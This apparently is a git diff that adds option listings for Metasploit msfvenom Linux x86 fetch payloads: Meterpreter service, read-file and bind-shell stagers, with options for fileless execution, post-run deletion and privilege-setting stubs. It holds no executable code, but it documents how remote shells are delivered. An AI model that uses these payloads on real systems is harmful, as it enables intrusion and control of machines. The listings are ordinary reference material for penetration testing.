Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..55dd2db --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_bind_tcp.txt @@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Meterpreter Service, Bind TCP + Module: payload/cmd/linux/http/x86/metsvc_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uGdmuNanIf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..169a00c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_reverse_tcp.txt @@ -0,0 +1,98 @@ + + Name: HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline + Module: payload/cmd/linux/http/x86/metsvc_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME suLGFVvas no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-read_file.txt b/msfvenom/payload_options/cmd-linux-http-x86-read_file.txt new file mode 100644 index 0000000..e06e6e1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-read_file.txt @@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Linux Read File + Module: payload/cmd/linux/http/x86/read_file + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FD 1 yes The file descriptor to write output to +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PATH yes The file path to read + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QnjCOOhyrQR no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..b60a6ed --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fdqkxAHaFzWZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..9e7c3db --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,95 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wMOWTCaGA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_nonx_tcp.txt new file mode 100644 index 0000000..e077d3c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_nonx_tcp.txt @@ -0,0 +1,92 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/http/x86/shell/bind_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vTUEvLaWEShh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..a24123b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp.txt @@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dTytfMAWFU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..ac75929 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp_uuid.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_tcp_uuid + Platform: Linux + 